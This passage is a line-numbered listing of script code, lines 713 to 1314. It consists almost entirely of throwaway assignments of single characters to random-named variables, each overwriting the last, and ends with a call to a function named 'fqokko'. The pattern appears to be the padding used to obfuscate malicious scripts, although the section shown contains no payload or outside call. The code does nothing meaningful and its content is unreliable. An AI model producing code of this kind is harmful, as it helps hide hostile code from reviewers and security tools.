713 | lagwuqhha = "z"; | |
714 | lagwuqhha = "C"; | |
715 | lagwuqhha = "T"; | |
716 | lagwuqhha = "F"; | |
717 | lagwuqhha = "n"; | |
718 | lagwuqhha = "h"; | |
719 | lagwuqhha = "q"; | |
720 | lagwuqhha = "A"; | |
721 | lagwuqhha = "z"; | |
722 | lagwuqhha = "N"; | |
723 | lagwuqhha = "M"; | |
724 | lagwuqhha = "X"; | |
725 | lagwuqhha = "S"; | |
726 | lagwuqhha = "h"; | |
727 | lagwuqhha = "W"; | |
728 | lagwuqhha = "g"; | |
729 | lagwuqhha = "X"; | |
730 | lagwuqhha = "p"; | |
731 | lagwuqhha = "u"; | |
732 | acrgiqnbt = "J"; | |
733 | acrgiqnbt = "h"; | |
734 | acrgiqnbt = "J"; | |
735 | acrgiqnbt = "Z"; | |
736 | acrgiqnbt = "U"; | |
737 | acrgiqnbt = "R"; | |
738 | acrgiqnbt = "u"; | |
739 | acrgiqnbt = "Q"; | |
740 | acrgiqnbt = "K"; | |
741 | acrgiqnbt = "G"; | |
742 | acrgiqnbt = "U"; | |
743 | acrgiqnbt = "B"; | |
744 | acrgiqnbt = "f"; | |
745 | acrgiqnbt = "y"; | |
746 | acrgiqnbt = "_"; | |
747 | awnbbkbp = "D"; | |
748 | awnbbkbp = "J"; | |
749 | awnbbkbp = "K"; | |
750 | awnbbkbp = "v"; | |
751 | awnbbkbp = "Y"; | |
752 | awnbbkbp = "V"; | |
753 | awnbbkbp = "s"; | |
754 | awnbbkbp = "e"; | |
755 | awnbbkbp = "r"; | |
756 | awnbbkbp = "p"; | |
757 | awnbbkbp = "H"; | |
758 | awnbbkbp = "k"; | |
759 | awnbbkbp = "f"; | |
760 | awnbbkbp = "y"; | |
761 | awnbbkbp = "J"; | |
762 | awnbbkbp = "c"; | |
763 | awnbbkbp = "s"; | |
764 | awnbbkbp = "t"; | |
765 | awnbbkbp = "H"; | |
766 | awnbbkbp = "y"; | |
767 | awnbbkbp = "e"; | |
768 | awnbbkbp = "N"; | |
769 | awnbbkbp = "X"; | |
770 | awnbbkbp = "A"; | |
771 | awnbbkbp = "T"; | |
772 | awnbbkbp = "p"; | |
773 | awnbbkbp = "E"; | |
774 | awnbbkbp = "t"; | |
775 | yvsekks = "3"; | |
776 | eijwgqp = "D"; | |
777 | eijwgqp = "Y"; | |
778 | eijwgqp = "V"; | |
779 | eijwgqp = "Q"; | |
780 | eijwgqp = "k"; | |
781 | eijwgqp = "w"; | |
782 | eijwgqp = "m"; | |
783 | eijwgqp = "M"; | |
784 | eijwgqp = "h"; | |
785 | eijwgqp = "Z"; | |
786 | eijwgqp = "f"; | |
787 | eijwgqp = "w"; | |
788 | eijwgqp = "v"; | |
789 | eijwgqp = "P"; | |
790 | eijwgqp = "X"; | |
791 | eijwgqp = "D"; | |
792 | eijwgqp = "J"; | |
793 | eijwgqp = "A"; | |
794 | eijwgqp = "b"; | |
795 | eijwgqp = "t"; | |
796 | eijwgqp = "X"; | |
797 | eijwgqp = "s"; | |
798 | eijwgqp = "r"; | |
799 | eijwgqp = "q"; | |
800 | eijwgqp = "z"; | |
801 | eijwgqp = "i"; | |
802 | eijwgqp = "j"; | |
803 | eijwgqp = "T"; | |
804 | eijwgqp = "o"; | |
805 | eijwgqp = "N"; | |
806 | eijwgqp = "C"; | |
807 | eijwgqp = "Q"; | |
808 | eijwgqp = "d"; | |
809 | eijwgqp = "C"; | |
810 | eijwgqp = "Y"; | |
811 | eijwgqp = "2"; | |
812 | lnkibyby = "j"; | |
813 | lnkibyby = "N"; | |
814 | lnkibyby = "n"; | |
815 | lnkibyby = "g"; | |
816 | lnkibyby = "r"; | |
817 | lnkibyby = "Z"; | |
818 | lnkibyby = "u"; | |
819 | lnkibyby = "o"; | |
820 | lnkibyby = "s"; | |
821 | lnkibyby = "c"; | |
822 | lnkibyby = "X"; | |
823 | lnkibyby = "b"; | |
824 | lnkibyby = "w"; | |
825 | lnkibyby = "e"; | |
826 | lnkibyby = "y"; | |
827 | lnkibyby = "Z"; | |
828 | lnkibyby = "h"; | |
829 | lnkibyby = "s"; | |
830 | lnkibyby = "M"; | |
831 | lnkibyby = "i"; | |
832 | lnkibyby = "H"; | |
833 | lnkibyby = "c"; | |
834 | lnkibyby = "h"; | |
835 | lnkibyby = "k"; | |
836 | lnkibyby = "e"; | |
837 | qrftbpu = "s"; | |
838 | qrftbpu = "K"; | |
839 | qrftbpu = "g"; | |
840 | qrftbpu = "k"; | |
841 | sardd = "Q"; | |
842 | sardd = "n"; | |
843 | sardd = "a"; | |
844 | sardd = "I"; | |
845 | sardd = "r"; | |
846 | sardd = "W"; | |
847 | sardd = "z"; | |
848 | sardd = "J"; | |
849 | sardd = "M"; | |
850 | sardd = "a"; | |
851 | sardd = "u"; | |
852 | sardd = "o"; | |
853 | sardd = "l"; | |
854 | sardd = "L"; | |
855 | sardd = "F"; | |
856 | sardd = "Z"; | |
857 | sardd = "L"; | |
858 | sardd = "c"; | |
859 | sardd = "H"; | |
860 | sardd = "n"; | |
861 | sardd = "x"; | |
862 | qomfu = "P"; | |
863 | qomfu = "B"; | |
864 | qomfu = "e"; | |
865 | qomfu = "G"; | |
866 | qomfu = "\""; | |
867 | mhrjqm = "O"; | |
868 | mhrjqm = "G"; | |
869 | mhrjqm = "A"; | |
870 | mhrjqm = "p"; | |
871 | mhrjqm = "e"; | |
872 | mhrjqm = "C"; | |
873 | mhrjqm = "F"; | |
874 | mhrjqm = "f"; | |
875 | mhrjqm = "b"; | |
876 | mhrjqm = "N"; | |
877 | mhrjqm = "K"; | |
878 | mhrjqm = "H"; | |
879 | mhrjqm = "f"; | |
880 | mhrjqm = "c"; | |
881 | mhrjqm = "l"; | |
882 | mhrjqm = "j"; | |
883 | mhrjqm = "y"; | |
884 | mhrjqm = "o"; | |
885 | mhrjqm = "s"; | |
886 | mhrjqm = "b"; | |
887 | mhrjqm = "x"; | |
888 | mhrjqm = "a"; | |
889 | mhrjqm = "h"; | |
890 | mhrjqm = "u"; | |
891 | mhrjqm = "Z"; | |
892 | mhrjqm = "l"; | |
893 | mhrjqm = "p"; | |
894 | mhrjqm = "i"; | |
895 | mhrjqm = "Q"; | |
896 | mhrjqm = "P"; | |
897 | mhrjqm = "e"; | |
898 | mhrjqm = "g"; | |
899 | mhrjqm = "I"; | |
900 | mhrjqm = "h"; | |
901 | mhrjqm = "a"; | |
902 | mhrjqm = "Q"; | |
903 | mhrjqm = "o"; | |
904 | mhrjqm = "t"; | |
905 | mhrjqm = "."; | |
906 | lejryk = "E"; | |
907 | lejryk = "u"; | |
908 | lejryk = "%"; | |
909 | tvkejyw = "H"; | |
910 | tvkejyw = "q"; | |
911 | tvkejyw = "v"; | |
912 | tvkejyw = "S"; | |
913 | tvkejyw = "J"; | |
914 | tvkejyw = "1"; | |
915 | pinxctlpt = "U"; | |
916 | pinxctlpt = "J"; | |
917 | pinxctlpt = "Z"; | |
918 | pinxctlpt = "B"; | |
919 | pinxctlpt = "a"; | |
920 | pinxctlpt = "j"; | |
921 | pinxctlpt = "a"; | |
922 | pinxctlpt = "Q"; | |
923 | pinxctlpt = "S"; | |
924 | pinxctlpt = "F"; | |
925 | pinxctlpt = "H"; | |
926 | pinxctlpt = "i"; | |
927 | pinxctlpt = "w"; | |
928 | pinxctlpt = "G"; | |
929 | pinxctlpt = "h"; | |
930 | pinxctlpt = "w"; | |
931 | pinxctlpt = "F"; | |
932 | pinxctlpt = "S"; | |
933 | pinxctlpt = "l"; | |
934 | pinxctlpt = "H"; | |
935 | ntrfji = "f"; | |
936 | ntrfji = "w"; | |
937 | ntrfji = "j"; | |
938 | ntrfji = "U"; | |
939 | ntrfji = "P"; | |
940 | ntrfji = "K"; | |
941 | ntrfji = "v"; | |
942 | ntrfji = "V"; | |
943 | ntrfji = "&"; | |
944 | immtl = "X"; | |
945 | immtl = "u"; | |
946 | immtl = "v"; | |
947 | immtl = "m"; | |
948 | immtl = "0"; | |
949 | snabha = "M"; | |
950 | snabha = "a"; | |
951 | snabha = "p"; | |
952 | snabha = "y"; | |
953 | snabha = "W"; | |
954 | snabha = "S"; | |
955 | snabha = "Q"; | |
956 | snabha = "O"; | |
957 | snabha = "Z"; | |
958 | snabha = "p"; | |
959 | snabha = "U"; | |
960 | snabha = "u"; | |
961 | snabha = "h"; | |
962 | snabha = "F"; | |
963 | snabha = "G"; | |
964 | snabha = "g"; | |
965 | snabha = "S"; | |
966 | snabha = "G"; | |
967 | snabha = "R"; | |
968 | snabha = "p"; | |
969 | snabha = "n"; | |
970 | snabha = "y"; | |
971 | snabha = "y"; | |
972 | snabha = "I"; | |
973 | snabha = "y"; | |
974 | snabha = "E"; | |
975 | snabha = "l"; | |
976 | snabha = "j"; | |
977 | snabha = "z"; | |
978 | snabha = "X"; | |
979 | snabha = "s"; | |
980 | snabha = "b"; | |
981 | snabha = "i"; | |
982 | snabha = "i"; | |
983 | qqvapqd = "U"; | |
984 | qqvapqd = "w"; | |
985 | qrxrfryji = "T"; | |
986 | qrxrfryji = "U"; | |
987 | qrxrfryji = "u"; | |
988 | qrxrfryji = "r"; | |
989 | qrxrfryji = "V"; | |
990 | qrxrfryji = "H"; | |
991 | qrxrfryji = "R"; | |
992 | qrxrfryji = "M"; | |
993 | qrxrfryji = "f"; | |
994 | qrxrfryji = "l"; | |
995 | qrxrfryji = "p"; | |
996 | qrxrfryji = "w"; | |
997 | qrxrfryji = "d"; | |
998 | qrxrfryji = "P"; | |
999 | qrxrfryji = "H"; | |
1000 | qrxrfryji = "i"; | |
1001 | qrxrfryji = "d"; | |
1002 | qrxrfryji = "l"; | |
1003 | qrxrfryji = "o"; | |
1004 | qrxrfryji = "q"; | |
1005 | qrxrfryji = "K"; | |
1006 | qrxrfryji = "i"; | |
1007 | qrxrfryji = "M"; | |
1008 | qrxrfryji = "g"; | |
1009 | qrxrfryji = "6"; | |
1010 | cjbwueow = "Q"; | |
1011 | cjbwueow = "n"; | |
1012 | cjbwueow = "X"; | |
1013 | cjbwueow = "Z"; | |
1014 | cjbwueow = "c"; | |
1015 | cjbwueow = "A"; | |
1016 | cjbwueow = "w"; | |
1017 | cjbwueow = "b"; | |
1018 | cjbwueow = "d"; | |
1019 | cjbwueow = "k"; | |
1020 | cjbwueow = "G"; | |
1021 | cjbwueow = "r"; | |
1022 | cjbwueow = "z"; | |
1023 | cjbwueow = "e"; | |
1024 | cjbwueow = "B"; | |
1025 | cjbwueow = "R"; | |
1026 | cjbwueow = "l"; | |
1027 | cjbwueow = "O"; | |
1028 | cjbwueow = "O"; | |
1029 | cjbwueow = "P"; | |
1030 | cjbwueow = "Z"; | |
1031 | cjbwueow = "Q"; | |
1032 | cjbwueow = "W"; | |
1033 | cjbwueow = "Z"; | |
1034 | cjbwueow = "f"; | |
1035 | cjbwueow = "i"; | |
1036 | cjbwueow = "S"; | |
1037 | cjbwueow = "S"; | |
1038 | cjbwueow = "Q"; | |
1039 | cjbwueow = "a"; | |
1040 | cjbwueow = "4"; | |
1041 | ynjat = "L"; | |
1042 | ynjat = "G"; | |
1043 | ynjat = "H"; | |
1044 | ynjat = "x"; | |
1045 | ynjat = "j"; | |
1046 | ynjat = "i"; | |
1047 | ynjat = "p"; | |
1048 | ynjat = "H"; | |
1049 | ynjat = "D"; | |
1050 | ynjat = "j"; | |
1051 | ynjat = "E"; | |
1052 | ynjat = "b"; | |
1053 | ynjat = "E"; | |
1054 | ynjat = "O"; | |
1055 | ynjat = "e"; | |
1056 | ynjat = "j"; | |
1057 | ynjat = "I"; | |
1058 | ynjat = "K"; | |
1059 | ynjat = "W"; | |
1060 | ynjat = "l"; | |
1061 | ynjat = "z"; | |
1062 | ynjat = "M"; | |
1063 | ynjat = "n"; | |
1064 | lcbnbfcps = "d"; | |
1065 | lcbnbfcps = "c"; | |
1066 | lcbnbfcps = "o"; | |
1067 | lcbnbfcps = "H"; | |
1068 | lcbnbfcps = "k"; | |
1069 | lcbnbfcps = "d"; | |
1070 | lcbnbfcps = "s"; | |
1071 | lcbnbfcps = "K"; | |
1072 | lcbnbfcps = "X"; | |
1073 | lcbnbfcps = "N"; | |
1074 | lcbnbfcps = "K"; | |
1075 | lcbnbfcps = "P"; | |
1076 | lcbnbfcps = "a"; | |
1077 | lcbnbfcps = "W"; | |
1078 | lcbnbfcps = "D"; | |
1079 | lcbnbfcps = "F"; | |
1080 | lcbnbfcps = "q"; | |
1081 | ncpbzklwa = "m"; | |
1082 | aelqs = "q"; | |
1083 | aelqs = "t"; | |
1084 | aelqs = "R"; | |
1085 | aelqs = "R"; | |
1086 | aelqs = "L"; | |
1087 | aelqs = "U"; | |
1088 | aelqs = "R"; | |
1089 | aelqs = "w"; | |
1090 | aelqs = "x"; | |
1091 | aelqs = "v"; | |
1092 | aelqs = "b"; | |
1093 | aelqs = "k"; | |
1094 | aelqs = "s"; | |
1095 | aelqs = "u"; | |
1096 | aelqs = "w"; | |
1097 | aelqs = "R"; | |
1098 | aelqs = "x"; | |
1099 | aelqs = "q"; | |
1100 | aelqs = "i"; | |
1101 | aelqs = "q"; | |
1102 | aelqs = "8"; | |
1103 | tadpwp = "e"; | |
1104 | tadpwp = "c"; | |
1105 | tadpwp = "R"; | |
1106 | tadpwp = "e"; | |
1107 | tadpwp = "b"; | |
1108 | tadpwp = "K"; | |
1109 | tadpwp = "Z"; | |
1110 | tadpwp = "p"; | |
1111 | tadpwp = "t"; | |
1112 | tadpwp = "Z"; | |
1113 | tadpwp = "G"; | |
1114 | tadpwp = "x"; | |
1115 | tadpwp = "v"; | |
1116 | tadpwp = "L"; | |
1117 | tadpwp = "g"; | |
1118 | tadpwp = "C"; | |
1119 | tadpwp = "t"; | |
1120 | tadpwp = "X"; | |
1121 | tadpwp = "d"; | |
1122 | tadpwp = "G"; | |
1123 | tadpwp = "K"; | |
1124 | tadpwp = "K"; | |
1125 | tadpwp = "g"; | |
1126 | tadpwp = "P"; | |
1127 | tadpwp = "N"; | |
1128 | tadpwp = "Q"; | |
1129 | tadpwp = "B"; | |
1130 | tadpwp = "w"; | |
1131 | tadpwp = "y"; | |
1132 | tadpwp = "K"; | |
1133 | tadpwp = "y"; | |
1134 | tadpwp = "I"; | |
1135 | tadpwp = "K"; | |
1136 | tadpwp = "Z"; | |
1137 | tadpwp = "j"; | |
1138 | tadpwp = "l"; | |
1139 | tadpwp = "C"; | |
1140 | tadpwp = "D"; | |
1141 | tadpwp = "A"; | |
1142 | tadpwp = "X"; | |
1143 | tadpwp = "v"; | |
1144 | tadpwp = "e"; | |
1145 | tadpwp = "H"; | |
1146 | tadpwp = "9"; | |
1147 | wtbmgnya = "F"; | |
1148 | wtbmgnya = "m"; | |
1149 | wtbmgnya = "z"; | |
1150 | wtbmgnya = "D"; | |
1151 | wtbmgnya = "v"; | |
1152 | wtbmgnya = "g"; | |
1153 | wtbmgnya = "l"; | |
1154 | ohptjp = "X"; | |
1155 | ohptjp = "p"; | |
1156 | hxfpvg = "E"; | |
1157 | hxfpvg = "T"; | |
1158 | hxfpvg = "F"; | |
1159 | hxfpvg = "t"; | |
1160 | hxfpvg = "P"; | |
1161 | hxfpvg = "f"; | |
1162 | hxfpvg = "l"; | |
1163 | hxfpvg = "d"; | |
1164 | hxfpvg = "W"; | |
1165 | hxfpvg = "S"; | |
1166 | hxfpvg = "y"; | |
1167 | hxfpvg = "f"; | |
1168 | hxfpvg = "l"; | |
1169 | hxfpvg = "P"; | |
1170 | hxfpvg = "Y"; | |
1171 | hxfpvg = "e"; | |
1172 | hxfpvg = "l"; | |
1173 | hxfpvg = "T"; | |
1174 | hxfpvg = "m"; | |
1175 | hxfpvg = "Z"; | |
1176 | hxfpvg = "C"; | |
1177 | hxfpvg = "G"; | |
1178 | hxfpvg = "Z"; | |
1179 | hxfpvg = "a"; | |
1180 | hxfpvg = "q"; | |
1181 | hxfpvg = "Q"; | |
1182 | hxfpvg = "x"; | |
1183 | hxfpvg = "f"; | |
1184 | hxfpvg = "X"; | |
1185 | hxfpvg = "p"; | |
1186 | hxfpvg = "G"; | |
1187 | hxfpvg = "W"; | |
1188 | hxfpvg = "I"; | |
1189 | hxfpvg = "x"; | |
1190 | hxfpvg = "S"; | |
1191 | bgcioja = "w"; | |
1192 | bgcioja = "c"; | |
1193 | bgcioja = "d"; | |
1194 | bgcioja = "R"; | |
1195 | bgcioja = "M"; | |
1196 | bgcioja = "F"; | |
1197 | bgcioja = "L"; | |
1198 | bgcioja = "x"; | |
1199 | bgcioja = "R"; | |
1200 | bgcioja = "k"; | |
1201 | bgcioja = "G"; | |
1202 | bgcioja = "y"; | |
1203 | bgcioja = "k"; | |
1204 | bgcioja = "v"; | |
1205 | bgcioja = "q"; | |
1206 | bgcioja = "o"; | |
1207 | bgcioja = "Y"; | |
1208 | bgcioja = "X"; | |
1209 | bgcioja = "Y"; | |
1210 | bgcioja = "m"; | |
1211 | bgcioja = "k"; | |
1212 | bgcioja = "v"; | |
1213 | bgcioja = "C"; | |
1214 | lhqijm = "x"; | |
1215 | lhqijm = "I"; | |
1216 | lhqijm = "g"; | |
1217 | lhqijm = "M"; | |
1218 | lhqijm = "x"; | |
1219 | lhqijm = "A"; | |
1220 | lhqijm = "r"; | |
1221 | lhqijm = "R"; | |
1222 | lhqijm = "G"; | |
1223 | lhqijm = "m"; | |
1224 | lhqijm = "b"; | |
1225 | lhqijm = "g"; | |
1226 | lhqijm = "X"; | |
1227 | lhqijm = "U"; | |
1228 | lhqijm = "M"; | |
1229 | lhqijm = "H"; | |
1230 | lhqijm = "j"; | |
1231 | lhqijm = "Z"; | |
1232 | lhqijm = "w"; | |
1233 | lhqijm = "m"; | |
1234 | lhqijm = "a"; | |
1235 | lhqijm = "r"; | |
1236 | lhqijm = "V"; | |
1237 | lhqijm = "u"; | |
1238 | lhqijm = "z"; | |
1239 | lhqijm = "k"; | |
1240 | lhqijm = "I"; | |
1241 | lhqijm = "y"; | |
1242 | lhqijm = "g"; | |
1243 | lhqijm = "U"; | |
1244 | lhqijm = "p"; | |
1245 | lhqijm = "m"; | |
1246 | lhqijm = "B"; | |
1247 | lhqijm = "E"; | |
1248 | lhqijm = "e"; | |
1249 | lhqijm = "A"; | |
1250 | lhqijm = "v"; | |
1251 | lhqijm = "I"; | |
1252 | lhqijm = "k"; | |
1253 | lhqijm = "C"; | |
1254 | lhqijm = "g"; | |
1255 | lhqijm = "Q"; | |
1256 | lhqijm = "e"; | |
1257 | lhqijm = "G"; | |
1258 | lhqijm = "d"; | |
1259 | qvohddwpr = "f"; | |
1260 | qvohddwpr = "w"; | |
1261 | qvohddwpr = "K"; | |
1262 | qvohddwpr = "G"; | |
1263 | qvohddwpr = "v"; | |
1264 | qvohddwpr = "q"; | |
1265 | qvohddwpr = "O"; | |
1266 | qvohddwpr = "c"; | |
1267 | qvohddwpr = "i"; | |
1268 | qvohddwpr = "a"; | |
1269 | qvohddwpr = "l"; | |
1270 | qvohddwpr = "E"; | |
1271 | qvohddwpr = "X"; | |
1272 | qvohddwpr = "r"; | |
1273 | qvohddwpr = "B"; | |
1274 | qvohddwpr = "F"; | |
1275 | qvohddwpr = "M"; | |
1276 | qvohddwpr = "K"; | |
1277 | qvohddwpr = "I"; | |
1278 | qvohddwpr = "W"; | |
1279 | qvohddwpr = "x"; | |
1280 | qvohddwpr = "m"; | |
1281 | qvohddwpr = "y"; | |
1282 | qvohddwpr = "b"; | |
1283 | qvohddwpr = "c"; | |
1284 | qvohddwpr = "Q"; | |
1285 | qvohddwpr = "g"; | |
1286 | qvohddwpr = "n"; | |
1287 | qvohddwpr = "T"; | |
1288 | qvohddwpr = "N"; | |
1289 | qvohddwpr = "t"; | |
1290 | qvohddwpr = "v"; | |
1291 | qvohddwpr = "B"; | |
1292 | qvohddwpr = "O"; | |
1293 | dbtbnead = "V"; | |
1294 | dbtbnead = "a"; | |
1295 | dbtbnead = "t"; | |
1296 | dbtbnead = "d"; | |
1297 | dbtbnead = "o"; | |
1298 | dbtbnead = "f"; | |
1299 | dbtbnead = "y"; | |
1300 | dbtbnead = "C"; | |
1301 | dbtbnead = "l"; | |
1302 | dbtbnead = "O"; | |
1303 | dbtbnead = "C"; | |
1304 | dbtbnead = "G"; | |
1305 | dbtbnead = "F"; | |
1306 | dbtbnead = "b"; | |
1307 | dbtbnead = "R"; | |
1308 | dbtbnead = "h"; | |
1309 | dbtbnead = "M"; | |
1310 | dbtbnead = "h"; | |
1311 | dbtbnead = "X"; | |
1312 | dbtbnead = "x"; | |
1313 | dbtbnead = "U"; | |
1314 | fqokko ( ); |
|